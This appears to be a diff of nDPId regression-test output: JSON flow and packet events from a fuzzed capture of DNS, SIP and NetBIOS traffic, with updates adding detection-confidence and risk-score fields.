-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00718{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00827{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470083310,"flow_last_seen":1120470088311,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1120470187655,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470187655,"pkt":"ADBUADRWAODtAW69CABFAABEarEAAIARTKTAqAECwKgBAQrHADUAMPwEKPMAAAABAAAAAAAAATEBMAEwAzEyNwdzbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1120470187656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1120470187656,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470187656,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEAlcwDAqAEBwKgBAgA1CscAR96AKPOAAAABAAEAAAAAATFCMAEwAzEyNwdpbq1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1120469540839,"flow_last_seen":1120470162147,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1120469540839,"flow_last_seen":1120470162147,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470015072,"flow_last_seen":1120470024079,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470199678,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470199678,"pkt":"ADBUADRWAODtAW69CABBAABIarMAAIARTJ7xqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470200673,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1120470200673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470200673,"pkt":"ADBUADRWAODtAW69CABFAABIaqsAAIARTJ3AFgECwKgBAQrIADUANHAIufQBALQBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1120470202676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69CABFAABIarUAAIARTJzAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEZXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":47872,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470204679,"pkt":"ADBUADRWAODtAW69uwBFAABIarYAAIARTJvAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":47872}
 00421{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470207908,"pkt":"\/zT\/\/\/\/\/AODVAW69CABFAFJOarcAAIARkZbAqAECwKgB\/wCJAIkAOlt+hR0BEAABAAAAAABFIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
@@ -609,84 +609,84 @@
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470208654,"pkt":"\/\/\/\/\/\/\/\/AODtAW69JXMAAABOargAAIARS5XAqAECwKgB\/wCJAIkAOlt+hZ0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOREJFSkVPQ0FDQUNBQ0GQQUJNAAAgAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1120470208684,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470208684,"pkt":"ADBUADRWAODtAW69CABFAABIarkAAIARTJjAqAECwKgBAQrIADUANHAIufQBAAABAAAAADYABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
